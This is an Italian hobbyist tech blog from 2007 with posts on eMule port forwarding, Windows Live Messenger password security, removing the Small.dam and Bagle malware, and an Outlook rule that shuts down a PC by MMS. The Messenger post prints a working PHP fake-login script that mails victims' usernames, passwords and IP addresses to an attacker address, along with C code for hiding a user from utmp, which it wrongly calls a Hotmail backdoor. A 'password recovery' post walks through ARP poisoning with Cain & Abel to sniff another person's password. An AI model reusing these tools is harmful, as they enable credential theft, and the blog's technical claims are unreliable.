IL RUBATORE DI PASSWORD!

August 10

ID Alto in eMule

Chi di noi non usa quello che ormai è diventato il nostro supermercato personale, eMule? Ormai il mulo è entrato in ogni PC del mondo, dopo aver strappato il primo posto delle classifiche a Kazaa.

Uno dei primi problemi che eMule (attualmente arrivato alla versione 0.48a) può dare all'utente è l'ID Basso. Descriviamo questo problema altamente fastidioso, che in alcuni casi può portarvi all'esaurimento nervoso (io ci stavo arrivando per poterlo sistemare...)...

l'ID è un identificatore. Per chi ha avuto modo di programmare ad esempio in CSS, sa che l'ID è un tipo di selettore. In eMule, l'ID è una serie di numeri che corrispondono alla posizione del vostro client in una lista di client. Avere un ID Basso, quindi, significa essere tra gli ultimi di questa lista, e quindi col tempo che impiegherete per scaricare un file potreste divenire un Matusalemme...

Ma come risolvere questo problema? Di seguito analizzeremo due casi:

client autonomo;
collegamento server e terminale.

Vediamo il primo caso, che è quello più diffuso.

Ho scritto client autonomo per far intendere che il PC lavora indipendente, senza dover ricorrere ad altri PC.

Seguite questi passi per ottenere un ID Alto (nel caso in cui non avrete un ID Alto, almeno il vostro ID sarà aumentato, anche se sarà ancora sulla soglia del Basso):

innanzitutto, downloadate l'eseguibile di eMule. Nel caso in cui l'aveste già scaricato, aprite eMule e cliccate su Strumenti (in alto, nella barra in cui si trovano i pulsanti Trasferimenti, Cerca etc.) e cliccate su Wizard del Primo Avvio di eMule;
vi ritrovate nella prima configurazione del client. Lasciate inalterate le opzioni che vi si presentano davanti, tranne quelle inerenti alle porte da utilizzare. Adesso dovete immettere i numeri di porta corretti (visualizzateli nella guida di eMule sul sito ufficiale). Io, ad esempio, utilizzo per TCP la porta 44556 e per UDP la 44557. Confermate tutto e ritornate alla schermata principale;
adesso cliccate su un server per potervi collegare (vi consiglio i server DonkeyServer dall'1 al 6). Dopo aver stipulato la connessione, visionate il piccolo disegno posto nella parte inferiore (il piccolo mappamondo con le frecce).Se le due frecce sono diventate verdi, allora l'ID Alto è vostro, altrimenti le frecce dovrebbero essere gialle (siete ancora con l'ID Basso);
ciò che ci rimane da fare è impostare il router/modem che utilizzate. Assicuratevi anche che il vostro firewallcrei un'eccezioneper eMule. Dovete aprire l'apparato di sistema del vostro router/modem, aprendo un browser ed inserendo l'URL adatto, che nella maggior parte dei casi è dato dall'indirizzo IP del router/modem (per sapere qual è, vedi il punto successivo);
per visualizzare le proprie statistiche della connessione utilizzata, andate su Start - Esegui - CMD. Inserite il comando ipconfig /all e premete Invio. Monitorate la voce Gateway predefinito: quello è, per il 99% dei casi, l'URL del vostro apparato di sistema;
effettuate il login del vostro apparato di sistema, e attenzionate tra le varie voci del menu le voci NAT Clients (di solito è così). In questo modo, cerchiamo di aprire una strada ad eMule;
in NAT, realizziamo un ponte per il bypassaggio dei dati attraverso le porte precedentemente stabilite sul client (si dice che le nattiamo). Adesso dobbiamo vedere se è presente la voce Port Forwarding (può darsi che sia presente nella home page, controllate in entrambi i casi);
con Port Forwarding, forwardiamo le porte di eMule, cioè le apriamo. Dobbiamo creare, dunque, delle eccezioni: specifichiamo il nostro indirizzo IP, e NON quello del router/modem, le porte TCP ed UDP. Così apriamo le porte immesse in eMule (può darsi che dobbiate inserire anche il subnet mask e il gateway predefinito). Alla fine, salvate tutte le modifiche;
adesso riapriamo eMule e connettiamoci: le due freccette dovrebbero ora essere entrambe verdi: avete un ID Alto.

Adesso attenzioniamo il secondo caso, che si manifesta in quelle situazioni in cui un PC debba ricorrere ad un altro PC che gli funge da server.

Se avete il problema dell'ID Basso nel server (PC che permette il collegamento al terminale), rimediate usando ciò che ho appena scritto, altrimenti passate avanti con questa spiegazione.

Stavolta dobbiamo effettuare le modifiche sia nel server che nel terminale (soprattutto nel terminale). Dobbiamo infatti aprire le porte di eMule all'indirizzo IP del terminale, connettendoci all'apparato di sistema tramite il server, che funge da "manutentore". Nel complesso, il procedimento è simile a quello spiegato prima...

Nozioni base di sicurezza per Windows Live Messenger

Secondo una statistica, di cui non ricordo mai la provenienza, il primo programma instant-messaging utilizzato in tutto il mondo é Windows Live Messenger di casa Microsoft, seguito da Yahoo! Messenger. Proprio perché é il più usato, Windows Live Messenger é anche quello più soggetto a malintenzionati che vogliono ribare la password altrui, ma come fare a tenersi al riparo da questi ritardati mentali? Ecco i modi che un utente può utilizzare per riuscire a prendervi la password:

1) tramite una chiavetta USB, l'utente può avviare un programma, spesso di tipo sniffer o spoofing, che capta le password. SOLUZIONE: non memorizzare mai la password nel PC;

2) utilizzando un attacco che gli hacker chiamano brute force, ovvero forza bruta, e proprio perché é un attacco di forza bruta l'utente tira ad indovinare. SOLUZIONE: usate una password che contenga numeri, lettere e caratteri speciali. Eccone una: ]}°òPò876§§§@[*};

3) tramite la domanda segreta, utilizzata in tutti quei casi l'utente si dimentichi la password (SOLUZIONE: vi serve più fosforo). Infatti il malintenzionato può tentare di indovinare la risposta alla domanda, specialmente se vi conosce. SOLUZIONE: aggiungete alla fine della risposta una parola senza senso che non c'entri nulla col resto della risposta;

4) utilizzando il social engineering: molti utenti si creano indirizzi e-mail del tipo msn_staff@hotmail.it o supporto@hotmail.it, vi inseriscono tra i loro contatti e vi convincono di dargi la password e l'indirizzo e-mail poiché sono in corso degli aggiornamenti nei loro database. SOLUZIONE: state alla larga da questi contatti;

5) usando programmi come Messenger Pass, il Keylogger o addirittura l'apparente innocuo RockXP;

6) usando il Cookie Grabbing, che é semplicemente indistruttibile, ma siccome é stato fixato il bug che tale tecnica usufruiva é, attualmente, inutilizzabile, ma se dovessero risistemarlo, non avrete scampo. SOLUZIONE: eliminate tutti i cookie dopo ogni navigazione ed utilizzate ripulitori di sistema ed antivirus a volontà;

7) usando exploit, ovvero dei programmi backdoor che inserendosi nel server di Hotmail ruba le password a bizzeffe. Ad esempio un codice sorgente di una backdoor (in ambiente UNIX) é il seguente:

CODICE

-= INIZIO CODICE =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

#include <stdio.h>
#include <fcntl.h>
#include <sys/types.h>
#include <utmp.h>
#include <sys/stat.h>

struct utmp *user;
char *usrt;

main (argc,argv)
int argc;
char *argv[];
{
int fatto=0, cnt=0, start=1, index=0;
char err[80];
if (argc == 1) printf("Removing you from utmp\n");
if (argc == 2) printf("Changing your login to %s\n",argv[1]);
utmpname("/etc/utmp");
usrt = strrchr(ttyname(0),'/');
strcpy(usrt,++usrt);
while (fatto != 1) {
user = getutent();
cnt++;
if (strcmp(user->ut_line,usrt) == 0) fatto=1;
}
utmpname("/etc/utmp");
for (start=0; start<cnt; start++) {
user = getutent();
}
if (argc == 1) {
user->ut_type = LOGIN_PROCESS;
strcpy(user->ut_name,"LOGIN");
}
else user->ut_type = USER_PROCESS;
if (argc == 2) strcpy(user->ut_name,argv[1]);
pututline(user);
endutent();
}

-= FINE CODICE =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

SOLUZIONE: utilizzate un buon Firewall ed eventualmente un buon router/modem;

8) usando un fake login, ovvero utilizzare una pagina HTML identica a quella originale in cui eseguiamo il Log In nella nostra e-mail box di Hotmail, ma che invia la password ad un indirizzo di posta elettronica. Tutto si basa sull'uso di un file in PHP, di cui sono riuscito a trovarne il codice sorgente:

CODICE

<?

///////////////////////////////////

$yourmail = "mioaccount@mail.it"; //QUI E' DOVE VIENE MESSO L'INDIRIZZO DI POSTA ELETTRONICA DEL MALINTENZIONATO

///////////////////////////////////

// COMMENTI NON INSERITI

if (getenv(HTTP_X_FORWARDED_FOR)){
$ip = getenv(HTTP_X_FORWARDED_FOR); } else {
$ip = getenv(REMOTE_ADDR); }
$useragent=$_SERVER['HTTP_USER_AGENT'];
$td = date("F jS");
$date = date("d M, Y");
$time = date("g:i a");
$LogTime = trim(" Date: ".$date.", Time: ".$time);

mail("$yourmail", "Account $account", "Username: $account \nPassword: $password \n\nIndirizzo ip: $ip \nData log: $LogTime \nSystem Info: $useragent \n\nCoder SNaKE\nwww.myhackerzone.altervista.org","from: $account <$account>");
header( "Location: https://login.passport.net/uilogin.srf?lc=1040&id=2");
?>

SOLUZIONE: non loggatevi mai in siti Web che non siano di proprietà della MSN.

July 18

Aggiornamento settimanale del 18 luglio 2007

Aggiornamento settimanale del

18 luglio 2007

I moduli elenchi, Feed RSS ed ATOM sono stati aggiornati con successo.

..:Kamui The Best:..

10:27 AM | Add a comment | Send a message | Permalink | View trackbacks (0)

July 02

Aggiornamento settimanale del 2 luglio 200

Aggiornamento settimanale del

2 luglio 2007

Chiedo scusa per la mia mancanza durante questi mesi. In particolare chiedo scusa a gaetano ferraro per non aver potuto rispondere alla sua e-mail

..:Kamui The Best:..

April 14

Aggiornamento mensile del 14 aprile 2007

Aggiornamento mensile del

14 aprile 2007

..:Kamui The Best:..

April 06

Benvenuti nel Windows Live Space Kamui The Best - Servizi Attivi

Benvenuti nel Windows Live Space

Kamui The Best

Benvenuti nel mio Windows Live Space!

Il sito offre diversi servizi, aiuto sui blog e su Internet, quindi potete scegliere voi cosa fare. Se poi la gente vi comincia a dirvi come avete fatto questo e quell'altro, sponsorizzate gli interventi. Naturalmente, non siete affatto obbligati! Vi basta sapere che il sito rimane a disposizione dei visitatori e che io potrò darvi consigli utili per tutti via e-mail. (^_^)

Novità: Netstrike

Clicca qui sopra per accedere a Netstrike

Welcome in my Windows Live Space Kamui The Best - Active Services

Welcome in my Windows Live Space!

Kamui The Best

Welcome to all the visitors of my MSN Space! This intervention has been devoted to our foreign friends. Remember you: you are here all welcome ones! Maybe you can orient better if you go to my Guestbook. Then, if you want, you can leave one comment of yours. Thank you very much!

12:45 PM | Add a comment | Send a message | Permalink | View trackbacks (0)

Il demone delle reti P2P

Il demone delle reti P2P

Oramai per molti utenti è consuetudine utilizzare un software P2P come eMule, che possiamo definire come il nostro "centro commerciale virtuale". Molti non sanno però che le reti usate da questi software sono assai esposte a virus e pirati informatici. Tra i virus, infatti, ce n'è uno in particolare: Small.dam.

DESCRIZIONE VIRUS

Small.dam è un particolare trojan, che occupa 29.347 byte circa e che è mirato verso i S. O. Windows (9X, ME, NT, 2000 ed XP). La sua diffusione è alta, ma il livello della sua infezione è di livello medio. Small.dam è stato creato in seguito all'evento dell'uragano Kryll, che ha attraversato il nord Europa, creando seri problemi. Proprio per questo, i virus writer hanno approfittato della drammaticità della situazione per creare tale trojan.

COSA E' IN GRADO DI PROCURARE

Small.dam è un virus che si occupa delle reti P2P utilizzando la porta UDP. Lo scopo del virus è questo: stabilirsi all'interno del registro di sistema e creare una backdoor, che può essere usata da un qualsiasi pirata informatico per controllare il PC infetto ogniqualvolta esso si trovi connesso ad Internet. Oltre questo, Small.dam riduce il PC ad un botnet, ovvero un PC "zombie" inserito nel contesto di una rete il cui scopo è fornire spamming e atti di phishing. Quando si acquisisce il virus, esso crea una nuova chiave nel registro di sistema, chiamata HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wincom32

e un file EXE che si va ad inserire nella directory C:\Windows\System32\, chiamato wincom32.sys. Tale file può essere acquisito quando si clicca in un e-mail in cui vengono dette delle cose inerenti all'uragano Kryll, che sono assolutamente false. Addirittura, in una di queste e-mail si dice che Saddam Hussein sia ancora vivo.

La chiave che viene creata da Small.dam ha invece il compito di attuare il processo services.exe, che permette al trojan di attivarsi sempre, ogniqualvolta si avvia Windows. Naturalmente, Small.dam non poteva fermarsi: dopo tutte queste operazioni, continua la sua infezione creando il file peers.ini inserito nella cartella C:\Windows, con la quale Small.dam ottiene una lista di IP Adress usati dal software P2P con la quale potersi diffondere. In poche parole, si crea i suoi trampolini di lancio. Successivamente, mettendosi in connessione con gli altri PC infetti (tramite la lista peers), scarica sul sistema vittima il rootkit game0.exe, che nei laboratori Symantec viene definito come Trojan.Abwiz.F, e gli eseguibili game1.exe, game2.exe, game3.exe e game4.exe, che sono, tra l'altro, varianti del worm W32.Mixor.Q@mm; gli eseguibili hanno la capacità di rubare gli indirizzi presenti nella ribrica e continuando lo spamming. Insomma, Small.dam è un vero incubo per tutti gli utenti.

COME E' POSSIBILE ELIMINARLO

Come ogni virus pericoloso che si rispetti anche Small.dam ci rode nell'eliminarlo. Occorre dire che le operazioni di eliminazione del virus sono parecchie...

disabilitazione del ripristino configurazione del sistema - questo ci permetterà, in seguito, di non ritrovarci di nuovo con Small.dam. Questo, da una parte, è un punto a nostro vantaggio, dall'altra, invece, può capitare che il sistema faccia una copia di backup infetta, ma noi rischiamo (certamente avrete capito che a me piacciono MOLTO le sfide ). Andate su Start - Pannello di controllo - Sistema - Ripristino configurazione di sistema - Disattiva Ripristino configurazione di sistema - Applica;
blocco dei processi in esecuzione - occorre, dopo la fase 1, lavorare in ambiente protetto e con i processi bloccati: occorre, quindi, avviare il sistema in modalità provvisoria: se riavviate il PC, prima del caricamento del logo di Windows premete il tasto F8, e poi fate Invio sulla voce Riavvia il sistema in modalità provvisoria;
rimozione del trojan (PARTE I) - adesso viene la parte dell'eliminazione. Dopo che Small.dam ci ha rotto le scatole, finalmente lo possiamo mandare a casa. Per rimuovere il trojan, basta che aggiorniate il vostro antivirus preferito (io ho 3 antivirus... poi voi fate quello che volete) e che avviate una full scan del sistema. Fatto questo, l'antivirus vi DEVE dare traccia del virus. Naturalmente, eliminatelo e non siate clementi; successivamente, riavviate il sistema;
rimozione del trojan (PARTE II) - adesso che il trojan è scomparso (assicuratevi che ogni traccia di quest'ultimo sia scomparsa prima di procedere), possiamo procedere all'eliminazione delle sottochiavi create dal file wincom32.sys. Innanzitutto, dobbiamo accedere al registro di sistema: Start - Esegui - regedit - Invio. Verrete catapultati nel registro di sistema. Adesso, dalla voce File, cliccate su Esporta, verifichiamo che la voce Tutto sia selezionata: in questo modo, avrete una copia di backup delle chiavi del registro di sistema. Date un nome al file e poi salvate. Adesso identifichiamo la sottochiave HKEY_LOCAL_MACHINES\SYSTEM\CurrentControlSet\Services\wincom32 e selezioniamola, dopodiché eliminiamola;
rimozione del trojan (PARTE III) - adesso dobbiamo veramente sicerarci che non ci sia nessuan traccia né del trojan né dei suoi derivati. Ultimi file da eliminare sono il rootkit Trojan.Abwiz.F e i file game[1-2-3-4].exe, che sono varianti del worm W32.Mixor.Q@mm. Per quest'ultima operazione, dobbiamo utilizzare un apposito tool, denominato FixAbwiz, che può essere facilmente scaricato dal link http://securityresponse.symantec.com/avcenter/FizAbwiz.exe. Con esso, avviamo una scansione, che tra l'altro dovrebbe durare pochi minuti. Con il tool abbiamo cancellato dalla faccia del PC il rootkit, ma le varianti del worm, cioè i file game[1-2-3-4].exe dovranno essere tolti manualemente. Apriamo l'editor e cerchaimo le sottochiavi HKEY_LOCAL_MACHINES\SOFTWARE\Microsoft\Windows\CurrentVersion\Run e HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersione\Run. Attenzioniamo la prima sottochiave. Nella parte destra cerchiamo la voce "agent"= "%System%\ppl.exe" oppure "agent"=%System%\alsys.exe". Se la troviamo, eliminiamola. Adesso focalizziamoci sulla seconda sottochiave. Con la stessa procedura, eliminiamo i valori "taskdir"="%System%\taskdir.exe" e "adir"="%System%\adirss.exe". Adesso cerchiamo la sottochiave HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess. Dopo aver individuato la voce Start riportiamo valore al default: ecco il modo per farlo: scegliete la voce Modifica e digitiamo il valore 4 nel campo Dati valore, alla fine facciamo clic su Ok.

April 03

Aggiornamento mensile 4 aprile 2007

Aggiornamento mensile del

4 aprile 2007

..:Kamui The Best:..

12:52 PM | Add a comment | Send a message | Permalink | View trackbacks (0)

March 23

Verità sugli UFO

Parigi, 22 marzo - Per gli appassionati di Ufo una vera chicca . Prima nazione al mondo a farlo, la Francia ha deciso di aprire un sito web per documentare tutti i casi di avvistamento di oggetti non identificati degli ultimi 50 anni. Gli archivi on-line della Agenzia spaziale nazionale, che verranno aggiornati nel caso si presentino nuovi fenomeni, contengono tutti i dettagli di ogni singolo episodio, da quelli facilmente interpretabili a quelli piu' complessi. Dei 1.600 casi registrati fin dal 1954, quasi il 25% viene calssificato come difficilmente spiegabile. Lo e' per esempio quello avvenuto l'8 gennaio del 1981 nei pressi della citta' di Trans-en-Provence nel sud della Francia, quando un contadino rivelo' di aver visto un oggetto atterrare sul suo campo ad una cinquantina di metri di distanza da lui. La presunta astronave decollo' nuovamente poco dopo lasciando tracce di bruciatura sul terreno. Gli investigatori scattarono delle foto, presero dei campioni da analizzare, ma a tutt'oggi non e' stata ancora fornita una spiegazione credibile per il fenomeno. Il sito, il cui indirizzo e' www.cnes-geipan.fr, e' ben organizzato ed estremamente ricco di dettagli: si possono consultare perfino le scannerizzazioni dei rapporti di polizia originali.

Tratto da

5:40 PM | Add a comment | Send a message | Permalink | View trackbacks (0)

March 16

Benvenuti nel Windows Live Space Kamui The Best - Servizi Attivi

Benvenuti nel Windows Live Space

Kamui The Best

Benvenuti nel mio Windows Live Space!

Novità: Netstrike

Clicca qui sopra per accedere a Netstrike

7:43 PM | Add a comment | Send a message | Permalink | View trackbacks (0)

Welcome in my Windows Live Space Kamui The Best - Active services

Welcome in my Windows Live Space!

Kamui The Best

7:42 PM | Add a comment | Send a message | Permalink | View trackbacks (0)

March 15

HD DVD

Sembra solo ieri, quando ancora usavamo i floppy disk, ora ci sono le PenDrive, più piccole e molto più capienti. L'intera comunità di informatici e di utilizzatori di PC ha accolto la PenDrive a braccia aperte...ma sarà così anche per i nuovissimi dischi Blu-Ray Disc e HD DVD?

Vedremo se i sistemi di difesa degli HD DVD sono inviolabili...

..:Kamui The Best:..

HD DVD

una nuova guida di Kamui The Best

NOME: HD DVD

AUTORE: KAMUI THE BEST

DATA PUBBLICAZIONE: VENERDI' 6 APRILE ALLE 13.06

PAGINE: 6

AVVIA DOWNLOAD DEL FILE

5:04 PM | Add a comment | Send a message | Permalink | View trackbacks (0)

Un nuovo nemico: Win32/Bagle

Un nuovo nemico per il PC:

Win32/Bagle

Bagle è un nuovo virus abbastanza fastidioso. Più tecnicamente, è un worm polimorfo, che attacca i software di sicurezza, disablitando sia essi che i servizi di Windows.

I sistemi vulnerabili a Bagle sono Windows 9x/ME/NT/200/XP/Server 2003

Come sbarazzarsi di Bagle

In questo caso, i software di sicurezza vengono disabilitati, e quindi non possiamo contare sul loro prezioso aiuto. Innanzitutto occorre "snidiare" il nostro amico, che si è intrufolato nell'hard disk:

occorre fare una full scan dell'hard disk. Quando finite la scansione, dovete copiare i risultati della scansione;
copiate i risultati ed incollateli in una nuova pagina del Blocco Note (Start - Tutti i programmi - Accessori - Blocco Note). A questo punto controllate se nell'elenco sono presenti i file hldrrr.exe, wintems.exe e hidr.exe e poi cercate i driver m_hook.sys;
adesso, avviando il Task Manager di Windows, reperibile premendo la sequenza di tasti Ctrl+Alt+Canc, controlliamo nel tab Processi se tra le varie operazioni è presente il primo tipo di file citato nel punto 2 (hldrrr.exe). Se questo è presente, allora possiamo continuare l'eliminazione;

PREMESSA - Quando una macchina è stata infetta da un qualsiasi tipo di virus, è assai probabile che il sistema faccia delle copie di backup dei codici nocivi, il che comporta una riapparsa del virus, anche dopo la sua rimozione. Per procedere quindi dobbiamo disattivare questo strumento. Andando su Start - Impostazioni - Pannello di controllo - Sistema (cliccare sull'icona per due volte) e dirigersi sul tab Ripristino configurazione di sistema, da cui spuntiamo Disattiva Ripristino configurazione di sistema; alla fine applichiamo le modifiche.

Bagle è uno di quei virus che non permettono il funzionamento dei sistemi di sicurezza del software, il che ci rende più difficile la sua rimozione. Occorre quindi usare un software che permette di bypassare il problema. In questo caso, è consigliabile usare The Avenger. Se apriamo The Avenger, spuntiamo Load Script from file:. Occorre adesso creare lo script da caricare col nostro software;
aprite il Blocco Note ed immettiamo un nome qualsiasi. Il contenuto della nuova pagina dovrà contenere i dati che vi ho immesso qui di seguito:

Files to delete

%SystemDrive%:\Documents and Settings\[Utente corrente]\Dati Applicazioni\hidires\m_hook.sys

%SystemDrive%:\Documents and Settings\[Utente corrente]\Dati Applicazioni\hidires\hidr.exe

%SystemDrive%:\WINDOWS\System32\wintems.exe

%SystemDrive%:\WINDOWS\system32\hldrrr.exe

folders to delete:

%SystemDrive%:\Documents and Settings\[Utente corrente]\Dati Applicazioni\hidires

%SystemDrive%:\WINDOWS\exefld

registry keys to delete:

HKLM\SYSTEM\CurrentControlSet\Services\m_hook

HKLM\SYSTEM\CurrentControlSet\Enum\Root\

LEGACY_M_HOOK

registry values to delete:

HKLM\Software\Microsoft\Windows\Current

Version\Run\ hldrrr

Ricordare che la sigla %SystemDrive% e [utente corrente] devono essere rispettivamente sostituiti con l'unità hardware in questione e il nome dell'utente.

Alla fine, salvate il file e chiudete il Blocco Note. Adesso che abbiamo il nostro bel script fatto in casa, dobbiamo caricarlo con The Avenger. Alla fine della scansione, The Avenger ci chiederà di riavviare il PC e quindi voi effettuate il riavvio. Dopo il riavvio, ci verrà mostrato il log delle scansioni. Continuiamo la nostra caccia a Bagle usando l'editor del registro inserendo, da Start - Esegui, il comando regedit e cerchiamo la chiave HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run.

Adesso nella finestra di destra cerchiamo le voci hldrrr, drvsyskit e german.exe; se le abbiamo trovate, eliminatele, assieme alle chiavi HKEY_CURRENT_USER\Software\DateTime4, HKEY_CURRENT_USER\Software\FirstRRRun.

March 12

Sondaggio

Sondaggio

Secondo voi, si possono usare due sistemi operativi completamente differenti in uno stesso computer?

..:Kamui The Best:..

I risultati del sondaggio sono:

3 commenti su 4 dicono che NON è possibile usare due sistemi operativi in uno stesso PC

In realtà, è possibile. Probabilmente, un giorno vi spiegherò come fare...

March 11

Benvenuti nel Windows Live Space Kamui The Best - Servizi Attivi

Benvenuti nel Windows Live Space

Kamui The Best

Benvenuti nel mio Windows Live Space!

Novità: Netstrike

Clicca qui sopra per accedere a Netstrike

1:42 PM | Add a comment | Send a message | Permalink | View trackbacks (0)

Welcome in the Windows Live Space Kamui The Best - Active Services

Welcome in my Windows Live Space!

Kamui The Best

1:39 PM | Add a comment | Send a message | Permalink | View trackbacks (0)

Come recuperare la password dell'e-mail box

Capita, a volte, che qualcuno possa dimenticare la password della propria e-mail box (la casella di posta elettronica diversa ed unica sul Web per ogni utente registrato al servizio/provider). Allora, lì per lì, l'utente si strappa i capelli dalla testa, cercando di spremersi le meningi in modo da ricordare la password. Esiste un metodo un pò più semplice per recuperare la password perduta.

Kamui The Best

alla ricerca della password perduta

Per recuperare la nostra password (anche a me, una volta, è successo, poi ho risolto la situazione in questo modo), occorre possedere diversi requisiti:

il programma Cain & Abel
driver WinPcap v4.0 beta2

A questo punto, possiamo avventurarci alla ricerca della password perduta...

per prima cosa, occorre installare il programma Cain & Abel (Nota: alcuni antivirus, come Norton o Kaspersky, possono indentificare Cain & Abel come software pericoloso; in tal caso, ignoriamo tutto);
a questo punto subentrano i driver WinPcap v4.0 beta2: al termine dell'installazione di Cain & Abel, infatti, verrà richiesta l'installazione di questi driver, che tra l'altro sono necessari, in quanto senza di essi Cain & Abel non sarebbe in grado di reperire la password;
adesso, dopo queste installazioni, avviamo Cain & Abel. Dopo averlo avviato, passiamo alla schermata Configure - Sniffer ed impostiamo la schede di rete che usiamo per connetterci ad Internet;
dall'interfaccia principale del programma, premiamo sul pulsante Start/Stop Sniffer, facciamo clic col tasto destro del mouse su un punto vuoto della finestra, e, dal menu contestuale, facciamo clic su Scan MAC Adress e confermiamo cliccando su OK;
(FASE FACOLTATIVA) Nel caso non si conosca il proprio IP Adress, dovete aprire il prompt dei comandi (Start - Tutti i programmi - Accessori - Prompt dei comandi oppure facendo Start - Esegui ed inserendo nel campo sottostante cmd). Dopo aver aperto il prompt, inserite il comando ipconfig e premete Invio. A questo punto, cercate la voce Indirizzo IP e, accanto a questa scritta, c'è una serie di numeri: quello è il vostro indirizzo IP;
adesso ritorniamo su Cain & Abel e premiamo su APR, spostandoci sulla sezione Sniffer e cliccando sul tab APR; a questo punto, clicchiamo in una zona vuota all'interno dell'area Configuration/Routed Packets e premiamo il pulsante Add to list nella barra degli strumenti (quello a forma di +);
apparirà a video la nuova schermata New ARP Poison Routing. Scorrete la lista di sinistra ed identificate un IP Adress casuale (quello di vostra sorella va benissimo...), mentre nella lista di destra scegliete quello del vostro router/modem. Alla fine, cliccate su OK per procedere;
adesso, selezionando il vostro IP Adress, vi apparirà automaticamente la vostra amata password; per quanto riguarda l'IP Adress di vostra sorella, beh, un pò di immaginazione...

..:Kamui The Best:..

1:37 PM | Add a comment | Send a message | Permalink | View trackbacks (0)

Ti comando il PC con un MMS...

Se usiamo il programma di posta elettronica Microsoft Outlook, occorre applicare alle e-mail dei filtri in modo che essi li gestiscano adeguatamente. Tramite questa regola è possibile anche inviare dei comandi al PC per mezzo di semplici MMS, ma come fare?

REQUISITI NECESSARI

Microsoft Outlook (anche il 2003 va bene)

Blocco Note (o qualsiasi altro programma che ci consenta di creare il comando)

Telefono cellulare che permette l'invio di MMS ad indirizzi di posta elettronica

PASSO 1 - IL COMANDO

Aprite il Blocco Note ed inserite il seguente comando

shutdown -s

e salvate il file con estensione .bat, rinominadolo così:

NOME FILE: nomefile.bat

TIPO DI FILE: Tutti i file

CODIFICA: ANSI

Adesso, dopo aver salvato il file in qualsiasi punto vogliamo, avviamo Outlook. Selezioniamo la voce Strumenti/Regole e Avvisi e clicchiamo su Nuova regola

PASSO 2 - ALCUNE REGOLE DA SEGUIRE

Nella schermata Creazione guidata Regole cliccate su Crea nuova regola e poi su Avanti, attiviamo l'opzione con parole specifiche nell'oggetto. Adesso passiamo nella sezione Passaggio 2 selezionando il link parole specifiche.

PASSO 3 - DEFINIZIONE DELL'OGGETTO

Indichiamo il testo da cercare nell'oggetto, come per esempio codice_spegnimento, e clicchiamo su Aggiungi e su Ok. A questo punto ritorneremo alla schermata Creazione guidata Regole e clicchiamo quindi su Avanti. Nel passaggio successivo, spuntiamo la voce Avvia applicazione e, successivamente, la voce Applicazione.

PASSO 4 - CONFIGURAZIONI DI RICEVIMENTO COMANDO

Selezioniamo lo script nomefile.bat (che è il file creato precedentemente col Blocco Note) e torniamo su Creazione guidata Regole. Clicchiamo su Avanti, lasciando inalterate le opzioni e configurazioni, fino a cliccare su Avanti e poi su Fine.

PASSO 5 - ATTIVAZIONE FILTRO

Ritornando alla schermata Regole e Avvisi, fate clic su OK, in modo da poter attivare il filtro. A questo punto accediamo al menu

Strumenti/InviaRicevi/Impostazioni di InvioRicezione/Definisci gruppi di InvioRicezione di Outlook, spuntando la voce Pianifica Invio/Ricezione automatica, impostando come timer il valore 1

PASSO 6 - INVIO DEL COMANDO

A questo punto, siamo in grado di poter spegnere il nostro PC grazie al cellulare, inviando al nostro indirizzo e-mail il comando codice_spegnimento inserito in un MMS, poiché il PC, ricevendo il comando, attiverà lo script da noi creato, che arresterà il sistema.

..:Kamui The Best:..

12:46 PM | Add a comment | Send a message | Permalink | View trackbacks (0)

Discussione su OverClocking

Tecnica dell'overclocking

Ogni PC del pianeta possiede un proprio orologio e quando viene sottoposto a molte applicazioni, aumenta la velocità di riscaldamento della motherboard. Esiste un hack che si basa proprio su questo: l'overclocking, che consiste nel potenziare in modo esponenziale le prestazioni del PC, ma con un veloce aumento della temperatura della motherboard. La troppa temperatura può portare seri problemi alla motherboard, quindi se il PC si usa per poco tempo, non c'è nessun problema (1 ora al massimo).

Per effettuare un overclock, occorre manipolare via hardware e/o software le configurazioni del computer. Esistono vari siti che forniscono la documentazione necessaria ad effettuare un overclock: un esempio può essere HARDWARE UPGRADE.

Blog